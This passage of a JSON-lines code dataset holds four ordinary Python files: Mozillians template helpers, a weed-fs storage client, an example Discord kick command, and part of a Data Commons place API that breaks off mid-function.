{"seq_id":"7178227","text":"import re\nfrom datetime import date\n\nimport jinja2\nfrom jingo import register\n\n\nPARAGRAPH_RE = re.compile(r'(?:\\r\\n|\\r|\\n){2,}')\n\n\n@register.filter\ndef paragraphize(value):\n    return jinja2.Markup(\n        u'\\n\\n'.join(u'<p>%s</p>' % p.replace('\\n', '<br>\\n')\n                     for p in PARAGRAPH_RE.split(jinja2.escape(value))))\n\n\n@register.inclusion_tag('phonebook/includes/search_result.html')\n@jinja2.contextfunction\ndef search_result(context, profile):\n    d = dict(context.items())\n    d.update(profile=profile)\n    return d\n\n\n@register.function\ndef get_mozillian_years(userprofile):\n    if userprofile.date_mozillian:\n        year_difference = date.today().year - userprofile.date_mozillian.year\n        return year_difference\n    return 
None\n","sub_path":"mozillians/phonebook/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"37290956","text":"# ** -- coding: utf-8 -- **\n#!/usr/bin/env python\n#\n#Copyright (c) 2011 darkdarkfruit <darkdarkfruit@gmail.com>\n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n#THE SOFTWARE.\n#\n\n\n\n'''\npython interface of weed-fs.\n(https://code.google.com/p/weed-fs/)\n\nnote:\n ensure weed master-server and at least one volume-server are up\n default:\n master-server: 127.0.0.1:9333\n volume-server: 127.0.0.1:8080\n\n\n'''\n\n\n__all__ = ['WeedMaster', 'WeedVolume']\n\n\nimport json\nimport random\nimport StringIO\nimport urlparse\nimport requests\nfrom conf import LOGGER\n\n\nclass WeedAssignKey(dict):\n ''' represent this json in dict and object:\n\n {\"count\":1,\"fid\":\"3,01637037d6\",\"url\":\"127.0.0.1:8080\",\"publicUrl\":\"localhost:8080\"}\n\n '''\n def __init__(self, json_of_weed_response=None):\n\n self['fid'] = ''\n self['count'] = 0\n self['url'] = ''\n self['publicUrl'] = ''\n\n if json_of_weed_response:\n try:\n d = json.loads(json_of_weed_response)\n self.update(d)\n except Exception as e:\n LOGGER.error('Error for json.loads \"%s\".\\nException: %s'\n % (json_of_weed_response, e))\n\n for k, v in self.items():\n setattr(self, k, v)\n super(WeedAssignKey, self).__init__()\n\n\n\nclass WeedAssignKeyExtended(WeedAssignKey):\n ''' extend weed-assign-key for adding these keys:\n\n 'full_url', 'full_public_url', 'fid_full_url', 'fid_full_publicUrl':\n\n represents:\n self['full_url'] = 'http://' + self['url']\n self['full_publicUrl'] = 'http://' + self['publicUrl']\n self['fid_full_url'] = self['full_url'] + '/' + self['fid']\n self['fid_full_publicUrl'] = self['full_publicUrl'] + '/' + self['fid']\n\n '''\n def __init__(self, json_of_weed_response=None):\n super(WeedAssignKeyExtended, self).__init__(json_of_weed_response)\n self['full_url'] = urlparse.urljoin('http://', self['url'])\n self['full_publicUrl'] = urlparse.urljoin('http://', self['publicUrl'])\n self['fid_full_url'] = urlparse.urljoin(self['full_url'], self['fid'])\n self['fid_full_publicUrl'] = urlparse.urljoin(self['full_publicUrl'], self['fid'])\n for k, v in self.items():\n setattr(self, k, v)\n\n\n def update_full_urls(self):\n ''' update \"full_url\" and \"full_publicUrl\" '''\n self['full_url'] = urlparse.urljoin('http://', self['url'])\n self['full_publicUrl'] = urlparse.urljoin('http://', 
self['publicUrl'])\n self['fid_full_url'] = urlparse.urljoin(self['full_url'], self['fid'])\n self['fid_full_publicUrl'] = urlparse.urljoin(self['full_publicUrl'], self['fid'])\n\n\n\nclass WeedMaster(object):\n \"\"\"\n Weed-FS's master server(relative to volume-server)\n \"\"\"\n\n def __init__(self, host='127.0.0.1', port=9333):\n \"\"\"\n\n Arguments:\n - `host`:\n - `port`:\n \"\"\"\n self.host = host\n self.port = port\n self.url_base = 'http://' + self.host + ':' + str(self.port)\n self.url_assign = self.url_base + '/dir/assign'\n self.url_lookup = self.url_base + '/dir/lookup'\n self.url_vacuum = self.url_base + '/vol/vacuum'\n self.url_status = self.url_base + '/dir/status'\n\n\n def acquire_assign_info(self):\n \"\"\"\n acquire an assign key from master-server.\n assign_key is in json format like below:\n -----------\n {\"count\":1,\"fid\":\"3,01637037d6\",\"url\":\"127.0.0.1:8080\",\"publicUrl\":\"localhost:8080\"}\n -----------\n\n Arguments:\n - `self`:\n \"\"\"\n result = None\n try:\n r = requests.get(self.url_assign)\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s'\n % (self.url_status, e))\n result = None\n return result\n\n\n def acquire_new_assign_key(self, count=1):\n \"\"\"\n get a new avalable new volume-file-location from from weed-master by getting a new-assign-key\n Arguments:\n - `self`:\n\n assign_key is in json format like below:\n -----------\n {\"count\":1,\"fid\":\"3,01637037d6\",\"url\":\"127.0.0.1:8080\",\"publicUrl\":\"localhost:8080\"}\n -----------\n\n return a tuple(dst_file_fid, dst_volume_url) like below:\n ----------\n (dst_file_fid, http://{volume-url})\n (3,20392030920, http://127.0.0.1:8080)\n ----------\n\n \"\"\"\n assign_key_url = self.url_assign + '?count=' + str(count)\n dst_volume_url = None\n wak = WeedAssignKeyExtended()\n try:\n LOGGER.debug('Getting new dst_volume_url with master-assign-key-url: %s' % assign_key_url)\n r = requests.get(assign_key_url)\n key_dict = json.loads(r.content)\n\n wak.update(key_dict)\n wak.update_full_urls()\n\n LOGGER.info('Successfuly got dst_volume_url: %s' % dst_volume_url)\n except Exception as e:\n LOGGER.error('Could not get new assign key from the assign url: %s. Exception is: %s'\n % (assign_key_url, e))\n return wak\n\n\n\n def lookup(self, volume_id):\n \"\"\"\n lookup the urls of a volume\n return a json like below:\n -----------\n {\n \"locations\": [\n {\n \"publicUrl\": \"localhost:8080\",\n \"url\": \"localhost:8080\"\n }\n ]\n }\n -----------\n\n Arguments:\n - `self`:\n \"\"\"\n result = None\n try:\n r = requests.get(self.url_lookup + '?volumeId=%s' % volume_id)\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n result = None\n return result\n\n\n def vacuum(self):\n \"\"\"\n Force Garbage Collection\n\n If your system has many deletions, the deleted file's disk space will not be synchronously re-claimed. There is a background job to check volume disk usage. If empty space is more than the threshold, default to 0.3, the vacuum job will make the volume readonly, create a new volume with only existing files, and switch on the new volume. 
If you are impatient or doing some testing, vacuum the unused spaces this way.\n\n        > curl \"http://localhost:9333/vol/vacuum\"\n        > curl \"http://localhost:9333/vol/vacuum?garbageThreshold=0.4\"\n\n        return a json of refreshed status like below:\n        -----------\n        {\n          \"Topology\": {\n            \"DataCenters\": [\n              {\n                \"Free\": 93,\n                \"Max\": 100,\n                \"Racks\": [\n                  {\n                    \"DataNodes\": [\n                      {\n                        \"Free\": 93,\n                        \"Max\": 100,\n                        \"PublicUrl\": \"127.0.0.1:8080\",\n                        \"Url\": \"127.0.0.1:8080\",\n                        \"Volumes\": 7\n                      }\n                    ],\n                    \"Free\": 93,\n                    \"Max\": 100\n                  }\n                ]\n              }\n            ],\n            \"Free\": 93,\n            \"Max\": 100,\n            \"layouts\": [\n              {\n                \"replication\": \"000\",\n                \"writables\": [\n                  2,\n                  3,\n                  5,\n                  6,\n                  7,\n                  1,\n                  4\n                ]\n              }\n            ]\n          },\n          \"Version\": \"0.37\"\n        }\n        -----------\n\n        Arguments:\n        - `self`:\n        \"\"\"\n        result = None\n        try:\n            r = requests.get(self.url_vacuum)\n            result = json.loads(r.content)\n        except Exception as e:\n            LOGGER.error('Could not vacuum via: %s. Exception is: %s' % (self.url_vacuum, e))\n            result = None\n        return result\n\n\n    def get_status(self):\n        \"\"\"\n        get status of this volume\n\n        Arguments:\n        - `self`:\n        \"\"\"\n        result = None\n        try:\n            r = requests.get(self.url_status)\n            result = json.loads(r.content)\n        except Exception as e:\n            LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n            result = None\n        return result\n\n\n    def __repr__(self):\n        return '<WeedMaster: %s:%s>' % (self.host, self.port)\n\n\n\nclass WeedVolume(object):\n    \"\"\"\n    Weed-FS's volume server(relative to master-server)\n    \"\"\"\n\n    def __init__(self, host='127.0.0.1', port=8080):\n        \"\"\"\n\n        Arguments:\n        - `host`:\n        - `port`:\n        \"\"\"\n        self.host = host\n        self.port = port\n        self.url_base = 'http://' + self.host + ':' + str(self.port)\n        self.url_status = self.url_base + '/status'\n\n\n    def get_status(self):\n        \"\"\"\n        get status of this volume\n\n        Arguments:\n        - `self`:\n        \"\"\"\n        r = requests.get(self.url_status)\n        try:\n            result = json.loads(r.content)\n        except Exception as e:\n            LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n            result = None\n        return result\n\n\n    def __repr__(self):\n        return '<WeedVolume: %s:%s>' % (self.host, self.port)\n\n\n\n\nclass WeedOperation(object):\n    \"\"\"\n    do CRUD operations to weed-fs.\n    Currently, implement it with /* tornado and */ requests. Maybe mongrel2 + brubeck is better?\n\n    \"\"\"\n\n    def __init__(self, master_host='127.0.0.1', master_port='9333'):\n        self.master = WeedMaster(master_host, master_port)\n\n\n    def get_fid_full_url(self, fid):\n        \"\"\"\n        get an operable full_url by fid.\n        lookup info returns:\n        -----------\n        {\n          \"locations\": [\n            {\n              \"publicUrl\": \"localhost:8080\",\n              \"url\": \"localhost:8080\"\n            }\n          ]\n        }\n        -----------\n\n        return something like: 'http://127.0.0.1:8080/3,0230203913'\n        \"\"\"\n        result = None\n        volume_id = fid.split(',')[0]\n        full_url = ''\n        try:\n            # master.lookup() already returns a parsed dict, not a raw response\n            result = self.master.lookup(volume_id)\n            # _url = WEEDFS_MASTER_URL + '/dir/lookup?volumeId=%s' % volume_id\n            # LOGGER.debug('lookup volume by url: %s' % _url)\n            # r = requests.get(_url)\n            locations = result['locations']\n\n            # choose a random location\n            location = locations[random.randint(0, len(locations) - 1)]\n            full_url = 'http://%s/%s' % (location['url'], fid)\n        except Exception as e:\n            LOGGER.error('Could not get volume location of this fid: %s. 
Exception is: %s' % (fid, e))\n            result = None\n        return full_url\n\n\n    @staticmethod\n    def save_file_to_weed(fp, fid_full_url, fname=''):\n        \"\"\"\n        save fp(file-pointer, file-description) to remote weed\n        \"\"\"\n        tmp_uploading_file_name = fname or 'a.unknown'\n        rsp = requests.post(fid_full_url, files={'file' : (tmp_uploading_file_name, fp)})\n        # LOGGER.debug(rsp.request.headers)\n        if not rsp.json().has_key('size'): # post new file fails\n            err_msg = 'Could not save file on weed-fs with fid_full_url: %s' % (fid_full_url)\n            LOGGER.error(err_msg)\n            return (False, err_msg)\n        data = {\n            'fid_full_url' : fid_full_url,\n            'fname' : fname,\n            'storage_size' : rsp.json().get('size', 0),\n        }\n        return (True, data)\n\n\n    ## -----------------------------------------------------------\n    ## weedfs operation: CRUD starts\n    ## -----------------------------------------------------------\n    def create(self, fp, fname=''):\n        \"\"\"\n        create a file in weed-fs with @fid\n        \"\"\"\n        fid_full_url = 'wrong_url'\n        try:\n            wak = self.master.acquire_new_assign_key()\n            LOGGER.debug('Creating file: fp: %s, fname: %s, fid_full_url: %s'\n                         % (fp, fname, wak.fid_full_url))\n            return WeedOperation.save_file_to_weed(fp, wak.fid_full_url, fname)\n        except Exception as e:\n            err_msg = 'Could not create file: fp: %s, fname: %s, fid_full_url: %s, e: %s' % (fp, fname, fid_full_url, e)\n            LOGGER.error(err_msg)\n            return None\n\n\n    def read(self, fid, fname='', just_url=True):\n        \"\"\"\n        read/get a file from weed-fs with @fid.\n\n        @just_url:\n          True -> just return fid_full_url (web-servers/browsers like nginx, chrome can get resource by this url)\n          False -> return a http response of requests(package requests).\n        \"\"\"\n        fid_full_url = 'wrong_url'\n        try:\n            fid_full_url = self.get_fid_full_url(fid)\n            LOGGER.debug('Reading file(just_url:%s): fid: %s, fname: %s, fid_full_url: %s' % (just_url, fid, fname, fid_full_url))\n            if just_url:\n                return fid_full_url\n            else:\n                rsp = requests.get(fid_full_url)\n                return rsp\n        except Exception as e:\n            err_msg = 'Could not read file(just_url:%s): fid: %s, fname: %s, fid_full_url: %s, e: %s' % (just_url, fid, fname, fid_full_url, e)\n            LOGGER.error(err_msg)\n            return None\n\n\n    def update(self, fp, fid, fname=''):\n        \"\"\"\n        update a file in weed-fs with @fid\n        \"\"\"\n        fid_full_url = 'wrong_url'\n        try:\n            fid_full_url = self.get_fid_full_url(fid)\n            LOGGER.debug('Updating file: fp: %s, fname: %s, fid_full_url: %s' % (fp, fname, fid_full_url))\n            return WeedOperation.save_file_to_weed(fp, fid_full_url, fname)\n        except Exception as e:\n            err_msg = 'Could not update file: fp: %s, fname: %s, fid_full_url: %s, e: %s' % (fp, fname, fid_full_url, e)\n            LOGGER.error(err_msg)\n            return None\n\n\n    def delete(self, fid, fname=''):\n        \"\"\"\n        delete a file in weed-fs with @fid\n        \"\"\"\n        fid_full_url = 'wrong_url'\n        try:\n            fid_full_url = self.get_fid_full_url(fid)\n            LOGGER.debug('Deleting file: fid: %s, fname: %s, fid_full_url: %s' % (fid, fname, fid_full_url))\n\n            r = requests.delete(fid_full_url)\n            if r.json().has_key('size'):\n                return True\n        except Exception as e:\n            err_msg = 'Could not delete file: fid: %s, fname: %s, fid_full_url: %s, e: %s' % (fid, fname, fid_full_url, e)\n            LOGGER.error(err_msg)\n            return False\n        return False\n    ## -----------------------------------------------------------\n    ## weedfs operation: CRUD ends\n    ## -----------------------------------------------------------\n\n\n    def create_multiple(self, fp_array):\n        ''' create/save multiple files '''\n        # try:\n        #     wak = self.master.acquire_new_assign_key(count)\n        # 
waks.append(wak)\n        #     fnames.append(fname)\n        # for i in range(count - 1):\n        #     _w = {}\n        #     _w.update(wak)\n        #     seq = '_%d' % (i + 1)\n        #     _w.update({'fid' : wak.fid + seq})\n        #     _w.update_full_urls()\n        #     waks.append(_w)\n        #     fname.append(fname + seq)\n\n        # for (i, w) in sequence(waks):\n        #     return WeedOperation.save_file_to_weed(fp, waks[i], fnames[i])\n\n        pass\n\n\n    def update_by_fid(self, dst_fid, src_fid, src_fname=''):\n        \"\"\"\n        replace file@dst_fid with file@src_fid\n        \"\"\"\n        try:\n            src_file_rsp = self.read(src_fid, fname=src_fname, just_url=False)\n            fp = StringIO.StringIO(src_file_rsp.content)\n            LOGGER.debug('Updating file: dst_fid: %s, src_fid: %s, src_fname: %s, fp: %s' % (dst_fid, src_fid, src_fname, fp))\n            return self.update(fp, dst_fid, src_fname)\n        except Exception as e:\n            err_msg = 'Could not update file: dst_fid: %s, src_fid: %s, src_fname: %s. e: %s' % (dst_fid, src_fid, src_fname, e)\n            LOGGER.error(err_msg)\n            return None\n\n\n\n","sub_path":"weed/weed_deprecated.py","file_name":"weed_deprecated.py","file_ext":"py","file_size_in_byte":17511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"444996392","text":"import discord\nfrom discord.ext import commands\n\nbot = commands.Bot(command_prefix=\"!\")\n\n@bot.event\nasync def on_ready(): # Creates an event that is called when the bot is connected to discord\n    print(\"I am ready\")\n\n@commands.has_permissions(kick_members=True) #only allow the command if the user has the kick members permission\n@bot.command()\nasync def kick(ctx, user: discord.Member, *, reason=\"No reason provided\"):\n    embed = discord.Embed(title=f\":boot: Kicked {user.name}!\", description=f\"Reason: {reason}\\nBy: {ctx.author.mention}\") #create a kick embed\n    await ctx.message.delete()\n    await ctx.send(embed=embed)# send the embed in the channel\n    await user.send(embed=embed) #send the embed to the user\n    await user.kick(reason=reason) #kick the user with the specified reason\n    \nbot.run(\"token\") #run the bot","sub_path":"examples/example_kick.py","file_name":"example_kick.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"84443486","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#      http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport collections\nimport json\nimport re\n\nfrom flask import Blueprint, request, Response, url_for, g\nfrom flask_babel import gettext\n\nfrom cache import cache\nimport services.datacommons as dc\nfrom services.datacommons import fetch_data\nfrom routes.api.shared import cached_name\nimport routes.api.stats as stats_api\nimport lib.i18n as i18n\n\nCHILD_PLACE_LIMIT = 50\n\n# Place types to keep for list of child places, keyed by parent place type.\nWANTED_PLACE_TYPES = {\n    'Country': [\n        \"State\", \"EurostatNUTS1\", \"EurostatNUTS2\", \"AdministrativeArea1\"\n    ],\n    'State': [\"County\"],\n    'County': [\"City\", \"Town\", \"Village\", \"Borough\"],\n}\nALL_WANTED_PLACE_TYPES = [\n    \"Country\", 
\"State\", \"County\", \"City\", \"Town\", \"Village\", \"Borough\",\n \"CensusZipCodeTabulationArea\", \"EurostatNUTS1\", \"EurostatNUTS2\",\n \"EurostatNUTS3\", \"AdministrativeArea1\", \"AdministrativeArea2\",\n \"AdministrativeArea3\", \"AdministrativeArea4\", \"AdministrativeArea5\"\n]\n\n# These place types are equivalent: prefer the key.\nEQUIVALENT_PLACE_TYPES = {\n \"State\": \"AdministrativeArea1\",\n \"County\": \"AdministrativeArea2\",\n \"City\": \"AdministrativeArea3\",\n \"Town\": \"City\",\n \"Borough\": \"City\",\n \"Village\": \"City\",\n}\n\nSTATE_EQUIVALENTS = {\"State\", \"AdministrativeArea1\"}\nUS_ISO_CODE_PREFIX = 'US'\nENGLISH_LANG = 'en'\n\n# Define blueprint\nbp = Blueprint(\"api.place\", __name__, url_prefix='/api/place')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_property_value(dcid, prop, out=True):\n return dc.get_property_values([dcid], prop, out)[dcid]\n\n\n@bp.route('/type/<path:place_dcid>')\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_place_type(place_dcid):\n place_types = get_property_value(place_dcid, 'typeOf')\n # We prefer to use specific type like \"State\", \"County\" over\n # \"AdministrativeArea\"\n chosen_type = None\n for place_type in place_types:\n if not chosen_type or chosen_type.startswith('AdministrativeArea') \\\n or chosen_type == 'Place':\n chosen_type = place_type\n return chosen_type\n\n\ndef get_name(dcids):\n \"\"\"Returns display names for set of dcids.\n\n Args:\n dcids: A list of place dcids.\n\n Returns:\n A dictionary of display place names, keyed by dcid.\n \"\"\"\n return cached_name('^'.join((sorted(dcids))))\n\n\n@bp.route('/name')\ndef api_name():\n \"\"\"Get place names.\"\"\"\n dcids = request.args.getlist('dcid')\n result = get_name(dcids)\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef cached_i18n_name(dcids, locale, should_resolve_all):\n \"\"\"Returns localization names for set of dcids.\n\n Args:\n dcids: ^ separated string of dcids. 
It must be a single string for the cache.\n        locale: the desired localization language code.\n        should_resolve_all: True if every dcid should be returned with a\n            name, False if only i18n names should be filled\n\n    Returns:\n        A dictionary of place names, keyed by dcid (potentially sparse if should_resolve_all=False)\n    \"\"\"\n    dcids = dcids.split('^')\n    response = fetch_data('/node/property-values', {\n        'dcids': dcids,\n        'property': 'nameWithLanguage',\n        'direction': 'out'\n    },\n                          compress=False,\n                          post=True)\n    result = {}\n    dcids_default_name = []\n    locales = i18n.locale_choices(locale)\n    for dcid in dcids:\n        values = response[dcid].get('out')\n        # If there is no nameWithLanguage for this dcid, fall back to name.\n        if not values:\n            dcids_default_name.append(dcid)\n            continue\n        result[dcid] = ''\n        for locale in locales:\n            for entry in values:\n                if has_locale_name(entry, locale):\n                    result[dcid] = extract_locale_name(entry, locale)\n                    break\n            if result[dcid]:\n                break\n    if dcids_default_name:\n        if should_resolve_all:\n            default_names = cached_name('^'.join(sorted(dcids_default_name)))\n        else:\n            default_names = {}\n        for dcid in dcids_default_name:\n            result[dcid] = default_names.get(dcid, '')\n    return result\n\n\ndef has_locale_name(entry, locale):\n    return entry['value'].endswith('@' + locale.lower())\n\n\ndef extract_locale_name(entry, locale):\n    if entry['value'].endswith('@' + locale.lower()):\n        locale_index = len(entry['value']) - len(locale) - 1\n        return entry['value'][:locale_index]\n    else:\n        return ''\n\n\ndef get_i18n_name(dcids, should_resolve_all=True):\n    \"\"\"Returns localization names for a set of dcids.\n\n    Args:\n        dcids: A list of place dcids.\n        should_resolve_all: True if every dcid should be returned with a\n            name, False if only i18n names should be filled\n\n    Returns:\n        A dictionary of place names, keyed by dcid (potentially sparse if should_resolve_all=False)\n    \"\"\"\n    return cached_i18n_name('^'.join((sorted(dcids))), g.locale,\n                            should_resolve_all)\n\n\n@bp.route('/name/i18n')\ndef api_i18n_name():\n    \"\"\"Get place i18n names.\"\"\"\n    dcids = request.args.getlist('dcid')\n    result = get_i18n_name(dcids)\n    return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@bp.route('/statsvars/<path:dcid>')\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef statsvars_route(dcid):\n    \"\"\"Get all the statistical variables that exist for a given place.\n    Args:\n      dcid: Place dcid.\n    Returns:\n      A list of statistical variable dcids.\n    \"\"\"\n    return Response(json.dumps(statsvars(dcid)),\n                    200,\n                    mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef statsvars(dcid):\n    \"\"\"\n    Get all the statistical variable dcids for a place.\n    \"\"\"\n    response = fetch_data('/place/stats-var', {\n        'dcids': [dcid],\n    },\n                          compress=False,\n                          post=False,\n                          has_payload=False)\n    return response['places'][dcid].get('statsVars', [])\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef get_stat_vars_union(places, stat_vars):\n    \"\"\"Get all the statistical variable dcids for some places.\n\n    Args:\n        places: Place DCIDs separated by \"^\" as a single string.\n        stat_vars: list of stat var dcids.\n\n    Returns:\n        List of unique statistical variable dcids each as a string.\n    \"\"\"\n    places = places.split(\"^\")\n    # The two indexings are due to how protobuf fields are converted to json\n    return fetch_data('/v1/place/stat-vars/union', {\n        'dcids': places,\n        'statVars': stat_vars,\n    },\n                      compress=False,\n                      post=True,\n                      
has_payload=False).get('statVars', [])\n\n\n@bp.route('/stat-vars/union', methods=['POST'])\ndef get_stat_vars_union_route():\n    \"\"\"Get all the statistical variables that exist for some places.\n\n    Returns:\n        List of unique statistical variable dcids each as a string.\n    \"\"\"\n    dcids = sorted(request.json.get('dcids', []))\n    stat_vars = (request.json.get('statVars', []))\n\n    return Response(json.dumps(get_stat_vars_union(\"^\".join(dcids), stat_vars)),\n                    200,\n                    mimetype='application/json')\n\n\n@bp.route('/child/<path:dcid>')\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef child(dcid):\n    \"\"\"\n    Get top child places for a place.\n    \"\"\"\n    child_places = child_fetch(dcid)\n    for place_type in child_places:\n        child_places[place_type].sort(key=lambda x: x['pop'], reverse=True)\n        child_places[place_type] = child_places[place_type][:CHILD_PLACE_LIMIT]\n    return Response(json.dumps(child_places), 200, mimetype='application/json')\n\n\n# TODO(hanlu): get nameWithLanguage instead of using name.\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef child_fetch(dcid):\n    contained_response = fetch_data('/node/property-values', {\n        'dcids': [dcid],\n        'property': 'containedInPlace',\n        'direction': 'in'\n    },\n                                    compress=False,\n                                    post=True)\n    places = contained_response[dcid].get('in', [])\n\n    overlaps_response = fetch_data('/node/property-values', {\n        'dcids': [dcid],\n        'property': 'geoOverlaps',\n        'direction': 'in'\n    },\n                                   compress=False,\n                                   post=True)\n    places = places + overlaps_response[dcid].get('in', [])\n\n    dcid_str = '^'.join(sorted(map(lambda x: x['dcid'], places)))\n    pop = stats_api.get_stats_latest(dcid_str, 'Count_Person')\n\n    place_type = get_place_type(dcid)\n    wanted_types = WANTED_PLACE_TYPES.get(place_type, ALL_WANTED_PLACE_TYPES)\n    result = collections.defaultdict(list)\n    for place in places:\n        for place_type in place['types']:\n            place_pop = pop.get(place['dcid'], 0)\n            # TODO(beets): Remove this when we push resolved places to prod.\n            if place['dcid'].startswith('geoNames'):\n                continue\n            if place_type in wanted_types and place_pop > 0:\n                result[place_type].append({\n                    'name': place.get('name', place['dcid']),\n                    'dcid': place['dcid'],\n                    'pop': place_pop,\n                })\n\n    # Filter equivalent place types - if a child place occurs in multiple groups, keep it in the preferred group type.\n    for (preferred, equivalent) in EQUIVALENT_PLACE_TYPES.items():\n        if preferred in result and equivalent in result:\n            for preferred_place in result[preferred]:\n                for i, equivalent_place in enumerate(result[equivalent]):\n                    if preferred_place['dcid'] == equivalent_place['dcid']:\n                        del result[equivalent][i]\n                        break\n\n    # Drop empty categories (filter on the value of each (key, value) pair)\n    result = dict(filter(lambda x: len(x[1]) > 0, result.items()))\n    return result\n\n\n@bp.route('/parent/<path:dcid>')\ndef api_parent_places(dcid):\n    result = parent_places(dcid)[dcid]\n    return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef parent_places(dcids):\n    \"\"\" Get the parent place chain for a list of places.\n\n    Args:\n        dcids: ^ separated string of dcids. It must be a single string for the cache.\n\n    Returns:\n        A dictionary of lists of parent places, keyed by dcid.\n    \"\"\"\n    # In DataCommons knowledge graph, places have multiple containedInPlace\n    # relations with parent places, but these might not be comprehensive. 
For\n    # example, \"Mountain View\" is containedInPlace for \"Santa Clara County\" and\n    # \"California\" but not \"United States\":\n    # https://datacommons.org/browser/geoId/0649670\n    # Here get_parent_place is called three times to walk up to the top-level parents.\n    if not dcids:\n        return {}\n\n    result = {}\n    parents1 = get_parent_place(dcids)\n    dcids = dcids.split('^')\n    dcid_parents1_mapping = {}\n    for dcid in dcids:\n        first_parents = parents1[dcid]\n        result[dcid] = first_parents\n        if first_parents:\n            dcid_parents1_mapping[dcid] = first_parents[-1]['dcid']\n    if not dcid_parents1_mapping:\n        return result\n\n    parents2 = get_parent_place('^'.join(dcid_parents1_mapping.values()))\n    dcid_parents2_mapping = {}\n    for dcid in dcid_parents1_mapping.keys():\n        second_parents = parents2[dcid_parents1_mapping[dcid]]\n        result[dcid].extend(second_parents)\n        if second_parents:\n            dcid_parents2_mapping[dcid] = second_parents[-1]['dcid']\n    if not dcid_parents2_mapping:\n        return result\n\n    parents3 = get_parent_place('^'.join(dcid_parents2_mapping.values()))\n    for dcid in dcid_parents2_mapping.keys():\n        result[dcid].extend(parents3[dcid_parents2_mapping[dcid]])\n        result[dcid] = [x for x in result[dcid] if x['dcid'] != 'Earth']\n    return result\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\ndef get_parent_place(dcids):\n    \"\"\" Get containedInPlace for each place in a list of places\n\n    Args:\n        dcids: ^ separated string of dcids. It must be a single string for the cache.\n\n    Returns:\n        A dictionary of lists of containedInPlace, keyed by dcid.\n    \"\"\"\n    if dcids:\n        dcids = dcids.split('^')\n    else:\n        dcids = []\n    response = fetch_data('/node/property-values', {\n        'dcids': dcids,\n        'property': 'containedInPlace',\n        'direction': 'out'\n    },\n                          compress=False,\n                          post=True)\n    result = {}\n    for dcid in dcids:\n        parents = response[dcid].get('out', [])\n        parents.sort(key=lambda x: x['dcid'], reverse=True)\n        for i in range(len(parents)):\n            if len(parents[i]['types']) > 1:\n                parents[i]['types'] = [\n                    x for x in parents[i]['types']\n                    if not x.startswith('AdministrativeArea')\n                ]\n        result[dcid] = parents\n    return result\n\n\n@cache.memoize(timeout=3600 * 24)  # Cache for one day.\n@bp.route('/mapinfo/<path:dcid>')\ndef api_mapinfo(dcid):\n    \"\"\"\n    TODO(wsws/boxu): This function only works for the US, which doesn't have\n    the issue of crossing +-180 longitude and +-90 latitude. 
If this function is used\n    for places with those complicated situations, it needs to be adjusted\n    accordingly.\n    \"\"\"\n    left = 180\n    right = -180\n    up = -90\n    down = 90\n    coordinate_sequence_set = []\n    kmlCoordinates = get_property_value(dcid, 'kmlCoordinates')\n    if not kmlCoordinates:\n        return {}\n\n    coordinate_groups = kmlCoordinates[0].split('</coordinates><coordinates>')\n    for coordinate_group in coordinate_groups:\n        coordinates = coordinate_group.replace('<coordinates>', '').replace(\n            '</coordinates>', '').split(' ')\n        coordinate_sequence = []\n        for coordinate in coordinates:\n            v = coordinate.split(',')\n            x = float(v[0])\n            y = float(v[1])\n            left = min(left, x)\n            right = max(right, x)\n            down = min(down, y)\n            up = max(up, y)\n            coordinate_sequence.append({'lat': y, 'lng': x})\n        coordinate_sequence_set.append(coordinate_sequence)\n\n    x_spread = right - left\n    y_spread = up - down\n    margin = 0.02\n\n    result = {\n        'left': left - margin * x_spread,\n        'right': right + margin * x_spread,\n        'up': up + margin * 